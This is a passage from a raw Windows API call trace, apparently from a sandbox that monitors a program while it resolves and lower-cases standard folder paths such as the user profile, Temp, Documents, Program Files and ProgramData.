cchCount2=3) returned 3 [0065.470] GetLastError () returned 0x0 [0065.470] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\", lpFindFileData=0x6eee40 | out: lpFindFileData=0x6eee40*(dwFileAttributes=0x6eefcc, ftCreationTime.dwLowDateTime=0x77cb1ecd, ftCreationTime.dwHighDateTime=0x130264, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77c6e36c, ftLastWriteTime.dwLowDateTime=0x77c6e0d2, ftLastWriteTime.dwHighDateTime=0xaf0000, nFileSizeHigh=0x40, nFileSizeLow=0xb076d8, dwReserved0=0x6eee94, dwReserved1=0x3e, cFileName="\x02", cAlternateFileName="眬°皜°2")) returned 0xffffffff [0065.470] GetLastError () returned 0x2 [0065.470] SysReAllocStringLen (in: pbstr=0x6eee14*=0x0, psz="C:\\Users\\5P5NRG~1\\", len=0x12 | out: pbstr=0x6eee14*="C:\\Users\\5P5NRG~1\\") returned 1 [0065.470] SysReAllocStringLen (in: pbstr=0x6ef098*="C:\\Users\\5P5NRG~1\\", psz="C:\\Users\\5P5NRG~1", len=0x11 | out: pbstr=0x6ef098*="C:\\Users\\5P5NRG~1") returned 1 [0065.470] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1", nBufferLength=0x104, lpBuffer=0x6ee924, lpFilePart=0x6ee920 | out: lpBuffer="C:\\Users\\5P5NRG~1", lpFilePart=0x6ee920*="5P5NRG~1") returned 0x11 [0065.470] SysReAllocStringLen (in: pbstr=0x6eeb64*=0x0, psz="C:", len=0x2 | out: pbstr=0x6eeb64*="C:") returned 1 [0065.470] SysReAllocStringLen (in: pbstr=0x6eeb20*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6eeb20*="C:\\") returned 1 [0065.470] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.470] SysReAllocStringLen (in: pbstr=0x6eeb1c*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x6eeb1c*="C:\\Users\\") returned 1 [0065.470] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0065.470] SetLastError (dwErrCode=0x0) [0065.470] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0065.470] GetLastError () returned 0x0 [0065.470] FindFirstFileW (in: lpFileName="C:\\Users\\", lpFindFileData=0x6eeb88 | out: lpFindFileData=0x6eeb88*(dwFileAttributes=0x6eed14, ftCreationTime.dwLowDateTime=0x77cb1ecd, ftCreationTime.dwHighDateTime=0x130264, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77c6e36c, ftLastWriteTime.dwLowDateTime=0x77c6e0d2, ftLastWriteTime.dwHighDateTime=0xaf0000, nFileSizeHigh=0x30, nFileSizeLow=0xb0ac50, dwReserved0=0x6eebdc, dwReserved1=0x32, cFileName="\x02", cAlternateFileName="ꮴ°癔°\"")) returned 0xffffffff [0065.471] GetLastError () returned 0x2 [0065.471] SysReAllocStringLen (in: pbstr=0x6eeb5c*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x6eeb5c*="C:\\Users\\") returned 1 [0065.471] SysReAllocStringLen (in: pbstr=0x6eede0*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x6eede0*="C:\\Users") returned 1 [0065.471] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x6ee66c, lpFilePart=0x6ee668 | out: lpBuffer="C:\\Users", lpFilePart=0x6ee668*="Users") returned 0x8 [0065.471] SysReAllocStringLen (in: pbstr=0x6ee8ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x6ee8ac*="C:") returned 1 [0065.471] SysReAllocStringLen (in: pbstr=0x6ee868*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6ee868*="C:\\") returned 1 [0065.471] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.471] SysReAllocStringLen (in: pbstr=0x6ee864*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6ee864*="C:\\") returned 1 [0065.471] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.471] SetLastError (dwErrCode=0x0) [0065.471] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0065.471] GetLastError () returned 0x0 [0065.471] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x6ee8d0 | out: lpFindFileData=0x6ee8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ee924, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0xb0c8d8 [0065.471] FileTimeToLocalFileTime (in: lpFileTime=0x6ee8e4, lpLocalFileTime=0x6ee854 | out: lpLocalFileTime=0x6ee854) returned 1 [0065.471] FileTimeToDosDateTime (in: lpFileTime=0x6ee854, lpFatDate=0x6ee8b2, lpFatTime=0x6ee8b0 | out: lpFatDate=0x6ee8b2, lpFatTime=0x6ee8b0) returned 1 [0065.471] FindClose (in: hFindFile=0xb0c8d8 | out: hFindFile=0xb0c8d8) returned 1 [0065.472] SysReAllocStringLen (in: pbstr=0x6eede0*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x6eede0*="C:\\Users") returned 1 [0065.472] SysReAllocStringLen (in: pbstr=0x6eeb54*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x6eeb54*="C:\\Users") returned 1 [0065.472] SysReAllocStringLen (in: pbstr=0x6eede0*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x6eede0*="C:\\Users\\") returned 1 [0065.472] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1", lpFindFileData=0x6eeb88 | out: lpFindFileData=0x6eeb88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6eebdc, dwReserved1=0x32, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0xb0c8d8 [0065.472] FileTimeToLocalFileTime (in: lpFileTime=0x6eeb9c, lpLocalFileTime=0x6eeb0c | out: lpLocalFileTime=0x6eeb0c) returned 1 [0065.472] FileTimeToDosDateTime (in: lpFileTime=0x6eeb0c, lpFatDate=0x6eeb6a, lpFatTime=0x6eeb68 | out: lpFatDate=0x6eeb6a, lpFatTime=0x6eeb68) returned 1 [0065.472] FindClose (in: hFindFile=0xb0c8d8 | out: hFindFile=0xb0c8d8) returned 1 [0065.472] SysReAllocStringLen (in: pbstr=0x6ef098*="C:\\Users\\5P5NRG~1", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz", len=0x1d | out: pbstr=0x6ef098*="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 1 [0065.472] SysReAllocStringLen (in: pbstr=0x6eee0c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz", len=0x1d | out: pbstr=0x6eee0c*="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 1 [0065.472] SysReAllocStringLen (in: pbstr=0x6ef098*="C:\\Users\\5p5NrGJn0jS HALPmcxz", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", len=0x1e | out: pbstr=0x6ef098*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 1 [0065.472] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFindFileData=0x6eee40 | out: lpFindFileData=0x6eee40*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6eee94, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0xb0ca00 [0065.473] FileTimeToLocalFileTime (in: lpFileTime=0x6eee54, lpLocalFileTime=0x6eedc4 | out: lpLocalFileTime=0x6eedc4) returned 1 [0065.473] FileTimeToDosDateTime (in: lpFileTime=0x6eedc4, lpFatDate=0x6eee22, lpFatTime=0x6eee20 | out: lpFatDate=0x6eee22, lpFatTime=0x6eee20) returned 1 [0065.473] FindClose (in: hFindFile=0xb0ca00 | out: hFindFile=0xb0ca00) returned 1 [0065.473] SysReAllocStringLen (in: pbstr=0x6ef350*="C:\\Users\\5P5NRG~1\\AppData", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", len=0x25 | out: pbstr=0x6ef350*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 1 [0065.473] SysReAllocStringLen (in: pbstr=0x6ef0c4*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", len=0x25 | out: pbstr=0x6ef0c4*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 1 [0065.473] SysReAllocStringLen (in: pbstr=0x6ef350*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", len=0x26 | out: pbstr=0x6ef350*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 1 [0065.473] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFindFileData=0x6ef0f8 | out: lpFindFileData=0x6ef0f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ef14c, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0xb0ca00 [0065.473] FileTimeToLocalFileTime (in: lpFileTime=0x6ef10c, lpLocalFileTime=0x6ef07c | out: lpLocalFileTime=0x6ef07c) returned 1 [0065.473] FileTimeToDosDateTime (in: lpFileTime=0x6ef07c, lpFatDate=0x6ef0da, lpFatTime=0x6ef0d8 | out: lpFatDate=0x6ef0da, lpFatTime=0x6ef0d8) returned 1 [0065.473] FindClose (in: hFindFile=0xb0ca00 | out: hFindFile=0xb0ca00) returned 1 [0065.474] SysReAllocStringLen (in: pbstr=0x6ef608*="C:\\Users\\5P5NRG~1\\AppData\\Local", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", len=0x2b | out: pbstr=0x6ef608*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0065.474] SysReAllocStringLen (in: pbstr=0x6ef37c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", len=0x2b | out: pbstr=0x6ef37c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0065.474] SysReAllocStringLen (in: pbstr=0x6ef608*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", len=0x2c | out: pbstr=0x6ef608*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\") returned 1 [0065.474] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", lpFindFileData=0x6ef3b0 | out: lpFindFileData=0x6ef3b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef68f060, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xef68f060, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0xb0ca98 [0065.474] FileTimeToLocalFileTime (in: lpFileTime=0x6ef3c4, lpLocalFileTime=0x6ef334 | out: lpLocalFileTime=0x6ef334) returned 1 [0065.474] FileTimeToDosDateTime (in: lpFileTime=0x6ef334, lpFatDate=0x6ef392, lpFatTime=0x6ef390 | out: lpFatDate=0x6ef392, lpFatTime=0x6ef390) returned 1 [0065.474] FindClose (in: hFindFile=0xb0ca98 | out: hFindFile=0xb0ca98) returned 1 [0065.474] SysReAllocStringLen (in: pbstr=0x6ef64c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", len=0x30 | out: pbstr=0x6ef64c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp") returned 1 [0065.474] SysReAllocStringLen (in: pbstr=0x6ef71c*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", len=0x31 | out: pbstr=0x6ef71c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\") returned 1 [0065.474] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", len=0x31 | out: pbstr=0x6ef630*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\") returned 1 [0065.474] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", cchLength=0x31 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\") returned 0x31 [0065.474] SysReAllocStringLen (in: pbstr=0x6ef71c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\", len=0x31 | out: pbstr=0x6ef71c*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\") returned 1 [0065.475] SysReAllocStringLen (in: pbstr=0x22827b4*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\", len=0x31 | out: pbstr=0x22827b4*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\") returned 1 [0065.475] GetWindowsDirectoryW (in: lpBuffer=0x2291da8, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0065.475] SysReAllocStringLen (in: pbstr=0x6ef70c*=0x0, psz="C:\\Windows", len=0xa | out: pbstr=0x6ef70c*="C:\\Windows") returned 1 [0065.475] SysReAllocStringLen (in: pbstr=0x6ef710*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x6ef710*="C:\\Windows\\") returned 1 [0065.475] GetThreadLocale () returned 0x409 [0065.475] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.475] GetThreadLocale () returned 0x409 [0065.475] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Windows\\", lpFilePart=0x6ef400*=0x0) returned 0xb [0065.475] SysReAllocStringLen (in: pbstr=0x6ef710*="C:\\Windows\\", psz="C:\\Windows\\", len=0xb | out: pbstr=0x6ef710*="C:\\Windows\\") returned 1 [0065.475] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x6ef630*="C:\\Windows\\") returned 1 [0065.475] CharLowerBuffW (in: lpsz="C:\\Windows\\", cchLength=0xb | out: lpsz="c:\\windows\\") returned 0xb [0065.475] SysReAllocStringLen (in: pbstr=0x6ef710*="C:\\Windows\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x6ef710*="c:\\windows\\") returned 1 [0065.476] SysReAllocStringLen (in: pbstr=0x22827a8*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x22827a8*="c:\\windows\\") returned 1 [0065.476] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0065.495] SysReAllocStringLen (in: pbstr=0x6ef700*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", len=0x27 | out: pbstr=0x6ef700*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0065.496] SysReAllocStringLen (in: pbstr=0x6ef704*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", len=0x28 | out: pbstr=0x6ef704*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 1 [0065.496] GetThreadLocale () returned 0x409 [0065.496] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.496] GetThreadLocale () returned 0x409 [0065.496] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.496] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpFilePart=0x6ef400*=0x0) returned 0x28 [0065.496] SysReAllocStringLen (in: pbstr=0x6ef704*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", len=0x28 | out: pbstr=0x6ef704*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 1 [0065.496] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", len=0x28 | out: pbstr=0x6ef630*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 1 [0065.496] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchLength=0x28 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\") returned 0x28 [0065.496] SysReAllocStringLen (in: pbstr=0x6ef704*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\", len=0x28 | out: pbstr=0x6ef704*="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\") returned 1 [0065.496] SysReAllocStringLen (in: pbstr=0x22827a4*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\", len=0x28 | out: pbstr=0x22827a4*="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\") returned 1 [0065.496] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0065.665] SysReAllocStringLen (in: pbstr=0x6ef6f4*=0x0, psz="C:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x6ef6f4*="C:\\Users\\Public\\Documents") returned 1 [0065.665] SysReAllocStringLen (in: pbstr=0x6ef6f8*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x6ef6f8*="C:\\Users\\Public\\Documents\\") returned 1 [0065.665] GetThreadLocale () returned 0x409 [0065.665] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.665] GetThreadLocale () returned 0x409 [0065.665] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.665] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x6ef400*=0x0) returned 0x1a [0065.665] SysReAllocStringLen (in: pbstr=0x6ef6f8*="C:\\Users\\Public\\Documents\\", psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x6ef6f8*="C:\\Users\\Public\\Documents\\") returned 1 [0065.665] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x6ef630*="C:\\Users\\Public\\Documents\\") returned 1 [0065.666] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\", cchLength=0x1a | out: lpsz="c:\\users\\public\\documents\\") returned 0x1a [0065.666] SysReAllocStringLen (in: pbstr=0x6ef6f8*="C:\\Users\\Public\\Documents\\", psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x6ef6f8*="c:\\users\\public\\documents\\") returned 1 [0065.666] SysReAllocStringLen (in: pbstr=0x22827b8*=0x0, psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x22827b8*="c:\\users\\public\\documents\\") returned 1 [0065.666] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0065.668] SysReAllocStringLen (in: pbstr=0x6ef6e8*=0x0, psz="C:\\Program Files (x86)", len=0x16 | out: pbstr=0x6ef6e8*="C:\\Program Files (x86)") returned 1 [0065.668] SysReAllocStringLen (in: pbstr=0x6ef6ec*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x6ef6ec*="C:\\Program Files (x86)\\") returned 1 [0065.668] GetThreadLocale () returned 0x409 [0065.668] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.668] GetThreadLocale () returned 0x409 [0065.668] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.668] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x6ef400*=0x0) returned 0x17 [0065.668] SysReAllocStringLen (in: pbstr=0x6ef6ec*="C:\\Program Files (x86)\\", psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x6ef6ec*="C:\\Program Files (x86)\\") returned 1 [0065.668] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x6ef630*="C:\\Program Files (x86)\\") returned 1 [0065.669] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\", cchLength=0x17 | out: lpsz="c:\\program files (x86)\\") returned 0x17 [0065.669] SysReAllocStringLen (in: pbstr=0x6ef6ec*="C:\\Program Files (x86)\\", psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x6ef6ec*="c:\\program files (x86)\\") returned 1 [0065.669] SysReAllocStringLen (in: pbstr=0x22827bc*=0x0, psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x22827bc*="c:\\program files (x86)\\") returned 1 [0065.669] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\ProgramData") returned 0x0 [0065.885] SysReAllocStringLen (in: pbstr=0x6ef6dc*=0x0, psz="C:\\ProgramData", len=0xe | out: pbstr=0x6ef6dc*="C:\\ProgramData") returned 1 [0065.886] SysReAllocStringLen (in: pbstr=0x6ef6e0*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x6ef6e0*="C:\\ProgramData\\") returned 1 [0065.886] GetThreadLocale () returned 0x409 [0065.886] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.886] GetThreadLocale () returned 0x409 [0065.886] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.886] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x6ef400*=0x0) returned 0xf [0065.886] SysReAllocStringLen (in: pbstr=0x6ef6e0*="C:\\ProgramData\\", psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x6ef6e0*="C:\\ProgramData\\") returned 1 [0065.886] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x6ef630*="C:\\ProgramData\\") returned 1 [0065.886] CharLowerBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="c:\\programdata\\") returned 0xf [0065.886] SysReAllocStringLen (in: pbstr=0x6ef6e0*="C:\\ProgramData\\", psz="c:\\programdata\\", len=0xf | out: pbstr=0x6ef6e0*="c:\\programdata\\") returned 1 [0065.886] SysReAllocStringLen (in: pbstr=0x22827c0*=0x0, psz="c:\\programdata\\", len=0xf | out: pbstr=0x22827c0*="c:\\programdata\\") returned 1 [0065.886] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0065.887] SysReAllocStringLen (in: pbstr=0x6ef6d0*=0x0, psz="C:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x6ef6d0*="C:\\Program Files (x86)\\Common Files") returned 1 [0065.888] SysReAllocStringLen (in: pbstr=0x6ef6d4*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x6ef6d4*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0065.888] GetThreadLocale () returned 0x409 [0065.888] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.888] GetThreadLocale () returned 0x409 [0065.888] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.888] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x6ef400*=0x0) returned 0x24 [0065.888] SysReAllocStringLen (in: pbstr=0x6ef6d4*="C:\\Program Files (x86)\\Common Files\\", psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x6ef6d4*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0065.888] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x6ef630*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0065.888] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files\\", cchLength=0x24 | out: lpsz="c:\\program files (x86)\\common files\\") returned 0x24 [0065.888] SysReAllocStringLen (in: pbstr=0x6ef6d4*="C:\\Program Files (x86)\\Common Files\\", psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x6ef6d4*="c:\\program files (x86)\\common files\\") returned 1 [0065.888] SysReAllocStringLen (in: pbstr=0x22827c4*=0x0, psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x22827c4*="c:\\program files (x86)\\common files\\") returned 1 [0065.888] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x0 [0065.890] SysReAllocStringLen (in: pbstr=0x6ef6c4*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", len=0x26 | out: 